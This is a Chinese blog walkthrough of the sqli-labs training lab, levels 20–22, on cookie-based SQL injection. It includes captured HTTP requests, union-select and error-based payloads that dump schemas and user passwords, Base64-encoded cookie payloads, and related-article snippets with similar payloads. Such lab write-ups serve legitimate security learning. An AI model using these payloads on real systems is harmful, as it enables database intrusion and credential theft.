sqli-labs less-20 less-21 less-22 cookie注入

于 2024-10-09 22:05:20 发布
阅读量1.5k 收藏 25
点赞数 17
CC 4.0 BY-SA版权
分类专栏: sqli-labs靶场 文章标签: less 前端 css 数据库 sql mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/wanggonghanfei/article/details/142784127

COOKIE

作用:是由网络服务器存储在你电脑硬盘上的一个txt类型的小文件,它和你的网络行为有关,记录了当前用户的状态
形式:key=value
例如:当我们登录某个账号后,服务器会在cookies进行记录

在这里插入图片描述
在这里插入图片描述
个人理解当我们登录一个网站后。setcookie函数根据我们登录的账户及密码,加上获取当前时间等其他信息,来生成一个cookie,当我们再次访此页面,不需要重新登入,只需要比对cookie信息,比如在less-20中,cookie根据uname生成,然后用cookie中的信息来比对数据库中的uname,如果正确容许访问。负责拒绝

less-20

首先登入一个账号,模拟登入下的注入
登入后用bp抓包

GET /sq/Less-20/index.php HTTP/1.1
Host: 192.168.140.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.140.130/sq/Less-20/index.php
Connection: keep-alive
Cookie:uname=admin
Upgrade-Insecure-Requests: 1
Priority: u=0, i

发现相较于之前,没有了post提交的表单信息,而是ookie:uname=admin
发包,页面回显
在这里插入图片描述
页面有cookie信息和name及password
当我们发包时,数据库提取cookie的uname与数据库的uname进行比较。
于是我们便可以在cookie处进行注入

闭合方式

GET /sq/Less-20/index.php HTTP/1.1
Host: 192.168.140.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.140.130/sq/Less-20/index.php
Connection: keep-alive
Cookie:uname=admin' or 1=1 #
Upgrade-Insecure-Requests: 1
Priority: u=0, i

在cookie处多次尝试,确定闭合方式为',方法与前面关卡寻找闭合方式一样。

列数

Cookie:uname=admin’ order by 5 #
Cookie:uname=admin’ order by 4 #
Cookie:uname=admin’ order by 3 #

列数为3

回显位

Cookie:uname=adminaWE’ union select 1,2,3 #
记得uname为假值,来显示union查询的值

报数据

  • 所有表
  • Cookie:uname=adminaWE’ union select 1,group_concat(schema_name),3 from information_schema.schemata#
    security的所有表
  • Cookie:uname=adminaWE’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#
    users表的所有列
  • Cookie:uname=adminaWE’ union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=‘users’#
    数据
  • Cookie:uname=adminaWE’ union select 1,group_concat(username,password),3 from security.users #

less-21

本关卡当我们登入的时候发现页面显示
在这里插入图片描述
这里cookie变成了不认识的符号,我们复制过去百度一下,
在这里插入图片描述

发现这是一种编码,为Base64编码,熟悉的热相信一眼便可以看出来,于是我们不难猜测这是将前端表单信息进行编码,上传到后端解码在进行比对,
所以本关与less-20一致,只不过对cookie进行了Base64编码,我们在进行注入的时候可以先将语句写出来,进行编码,然后在bp中进行注入

闭合方式

构造语句并进行编码

在这里插入图片描述
在bp注入
在这里插入图片描述
回显
在这里插入图片描述
不难看出闭合方式为').

报数据

  • 所有表
  • Cookie:uname=adminaWE’) union select 1,group_concat(schema_name),3 from information_schema.schemata#
    编码YWRtaW5hV0UnKSB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQoc2NoZW1hX25hbWUpLDMgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuc2NoZW1hdGEj

security的所有表

  • Cookie:uname=adminaWE’) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#
    编码
    YWRtaW5hV0UnKSB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQodGFibGVfbmFtZSksMyBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPWRhdGFiYXNlKCkj

users表的所有列

  • Cookie:uname=adminaWE’) union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=‘users’#
    编码
    YWRtaW5hV0UnKSB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQoY29sdW1uX25hbWUpLDMgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9zY2hlbWE9ZGF0YWJhc2UoKSBhbmQgdGFibGVfbmFtZT0ndXNlcnMnIw==

数据

  • Cookie:uname=adminaWE’) union select 1,group_concat(username,password),3 from security.users #
    编码
    YWRtaW5hV0UnKSB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQodXNlcm5hbWUscGFzc3dvcmQpLDMgZnJvbSBzZWN1cml0eS51c2VycyAj

less-22

我们发现本关卡也对cookie进行了编码,当我们注入时,发现页面没有回显,当时页面有报错,所以使用报错注入,extractvalue,updatexml,floor都可以使用,闭合方式为".没有其他变化,所以不做过多演示,如果有需要,可以留言,我会将我的语句放在评论区

sqli-labs靶场实现(八)【cookie注入+cookie base64编码注入】(less-20less-22、具体步骤+图文详解)
weixin_46709219的博客
01-03 1303
一)cookie注入   1)cookie介绍   2)cookie注入代码分析   3)cookie注入利用   4)sqlmap安全检测 二)cookie base64编码注入   1)cookie介绍   2)cookie注入代码分析   3)cookie注入利用   4)sqlmap安全检测 —————————————————————————————————————————————————— 一)cookie注入 1)cookie介绍: 服务器可以利用cookie包含信息的任意性来筛选并经常性的
Sqli-labs靶场第2122关详解[Sqli-labs-less-2122]自动化注入-SQLmap工具注入|sqlmap跑base64加密
m0_73615178的博客
03-03 1319
由于21/22雷同,都是需要登录后,注入点通过Cookie值进行测试,值base64加密修改注入数据选项:--tamper=base64encode。
sqli-labs(less-20)
m0_64849639的博客
08-06 686
sqli-labs(less-20)
sqli-labs (less-20)
kukudeshuo的博客
03-11 375
sqli-labs (less-20) 进入20关,输入用户名和密码后,屏幕回显了我们的USER AGENT、IP地址、cookie信息 通过回显的为cookie信息我们猜测这关注入点很有可能在cookie里,题目提示也告诉我们为cookie注入 这里我们利用火狐的一个小工具来抓取cookie的信息,这个工具的名字为Cookies Manager +,我们打开来查看当前页面的cookie信息 我们输入’试试 屏幕回显报错 根据报错信息判断闭合方式为’#,并且为字符型注入 判断字段长度 判断字段
sqli-labs Less20
m0_60829468的博客
11-09 3203
说明 20关在传入参数时会生成cookie,对生成的cookie可以实行注入。 提交参数的第一个数据包 第二个数据包 一、对第二个数据包的cookie实行注入 Cookie: uname=uname=admin' and extractvalue(1,concat(0x7e,(database()),0x7e)) # 二、查表 Cookie: uname=uname=admin' and extractvalue(1,concat(0x7e,(select table...
sqli-labs/Less-20
m0_71299382的博客
11-18 294
sqli-labs第二十关
sqli-labs less-19 less-20 less-22
weixin_74182283的博客
04-02 1212
由于上述所说的cookie原理,一开始是不会有cookie信息的,但登录后,就会自动出现一则cookie信息。' and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) or '1'='1 通过报错注入的函数,对其进行攻击,成功得到数据库信息。' and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) or '1'='1 通过报错注入的函数,对其进行攻击,成功得到数据库信息。
Sqli-labs靶场第20关详解[Sqli-labs-less-20]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 1205
设想如果在Cookie尝试加上注入语句(报错注入),测试是否会执行并返回报错语句爆出想要的信息。,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。登录后会有记录 Cookie 值。在Cookie 处加上*代表注入点。
Sqli-labs Less18-Less23 HTTP头
beiweixiaotian66的博客
07-25 819
一丢丢Sqli-labs小练习
Sqli-labs Less17 报错注入
beiweixiaotian66的博客
07-25 407
一丢丢Sqli-labs小练习
SQL注入sqli-labs 20 Cookie注入
Zeker62的博客
08-12 403
使用前面关卡知道的账号密码:Dumb和Dumb进入 再进入的同时抓个包,发送到repeater模块 发现这个包有cookie,依据题目的题目明白这是个cookie注入: 加个单引号,报错; 报错信息我们知道这是个字符型注入,那剩下就简单多了 判断回显点 注意:Cookie语句中的注释是# ...
sqli-labs(九)_COOKIE注入
weixin_30877755的博客
08-29 270
第二十关: 这关是一个Cookie处的注入,输入正确的账号密码后,会跳到index.php页面,如下图 这个时候再访问登陆页面的时候http://localhost/sqli-labs-master/Less-20/还是上面的页面,因为登陆后将信息存在了Cookie中,后台进行判断,发现Cookie中有值时会显示上面的个人信息,而不是登录框。在上面哪些信息中可以看到,多出了一个Your I...
sqli-labs-Less-20 cookie注入(全套题目,持续更新)
yzcn
11-21 569
Less-20 cookie注入 **Cookie:**有时也用其复数形式 Cookies。类型为“小型文本文件”,是某些网站为了辨别用户身份,进行Session跟踪而储存在用户本地终端上的数据(通常经过加密),由用户客户端计算机暂时或永久保存的信息。 先正常登陆: 返回了输入的name和password,并提示使用cookie注入 判断注入点,使用插件Cookie Editor修改cookie,因为第一次登陆成功,cookie的值会在数据库存放,所以我们第一次登陆成功,后面更改cookie的值进行注入
sqli-labsless22 Cookie Injection- Error Based- Double Quotes - string (基于错误的双引号字符型Cookie注入)...
ajxi63204的博客
01-26 117
注入的过程和less 20 21一样,这次闭合cookie的使用的双引号 转载于:https://www.cnblogs.com/omnis/p/8360957.html
(手工)【sqli-labs20cookie注入:原理、利用过程
07-10 1058
SQL-cookie注入
sqli-labs Less-20cookie注入
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-03 419
本篇文章使用的环境为sqli-labs Less-20 不懂为什么使用账户admin:admin登陆后页面没有正常返回cookie,所有我使用工具添加了一条cookie信息, 使用burp suite抓取流量包 1、修改cookie值,发现是使用单引号闭合的 此处可以看到页面存在报错信息,可以使用报错注入 2、判断字段数 通过使用order by 进行判断,发现存在3个字段 3、尝试使用联合查询(使用联合查询时,需要使前面的查询语句结果为假),判断当前页面是否有显示位 可以看到当前页面存在显示位置
sqli labs less 20
Xiaoxiaoqiang_的博客
03-04 241
sql注入
sqli_labs less-20cookie注入
niuniu1996的博客
10-15 1077
因为前期已经做过堆叠查询时候将密码换成123456,所以这次登录账户名密码为以下内容 通过bp抓包,分析发现为字符型, 所以在后面加一个#,发现回显正常 此时考虑用报错注入。查出数据库名字 ...
sqli-labs less17-20
sopora的博客
10-09 654
LESS 17 基于错误的UPDATE查询 源码中的几个php函数: get_magic_quotes_gpc() magic_quotes_gpc函数在php中的作用是判断解析用户提示的数据,如包括有:post、get、cookie过来的数据增加转义字符“ ”,以确保这些数据不会引起程序,特别是数据库语句因为特殊字符引起的污染而出现致命的错误 get_magic_quotes_gpc...
sqli-labs less20
最新发布
02-22
### sqli-labs less20 实验教程 #### 了解目标环境 sqli-labs 是一个用于学习和实践 SQL 注入技术的平台。Less-20 关卡专注于通过 `Cookie` 进行 SQL 注入攻击[^3]。 #### 准备工作 确保已经安装并配置好 PHP 和 MySQL 环境,并且成功部署了 sqli-labs 平台。访问 Less-20 页面,观察其 URL 结构以及如何处理请求参数。 #### 测试注入点 尝试修改浏览器发送给服务器的 HTTP 请求头中的 `Cookie` 字段来测试是否存在漏洞。具体来说,在原始 `Cookie` 值后面附加恶意负载以探测数据库结构或提取敏感数据。 例如,可以通过篡改 `uname` 的值来进行联合查询(UNION SELECT),从而获取当前使用的数据库名称: ```http GET /sqli/Less-20/ HTTP/1.1 Host: localhost ... Cookie: uname=admin' UNION ALL SELECT NULL,database(),NULL-- ``` 上述 Payload 利用了闭合单引号 `'` 来结束预期输入,并紧接着执行新的 SQL 片段;两个连续破折线 `--` 表示注释掉后续部分以防报错中断整个语句。 #### 提升技巧:绕过简单防护措施 当面对某些基本防御机制时——比如自动转义特殊字符函数如 mysql_real_escape_string() ,可以考虑采用宽字节编码等方式构造有效载荷实现突破[^2]。 对于本关而言,则是利用 Base64 编码后的字符串作为用户名传递给应用程序,以此规避潜在过滤规则的影响。实际操作过程中需注意调整编码方式匹配后台解析逻辑。 #### 获取更多细节信息 一旦确认存在可被利用之处后,便能进一步挖掘其他有用情报,像枚举出 users 表内的字段名列表那样: ```sql Cookie: uname=<base64_encoded_payload> ``` 其中 `<base64_encoded_payload>` 应替换为经过适当转换得到的结果,形似如下所示: ```plaintext admin') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users'# ``` 这会返回 user 表中所有的列名作为一个单一字符串输出到页面上供分析人员查看。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值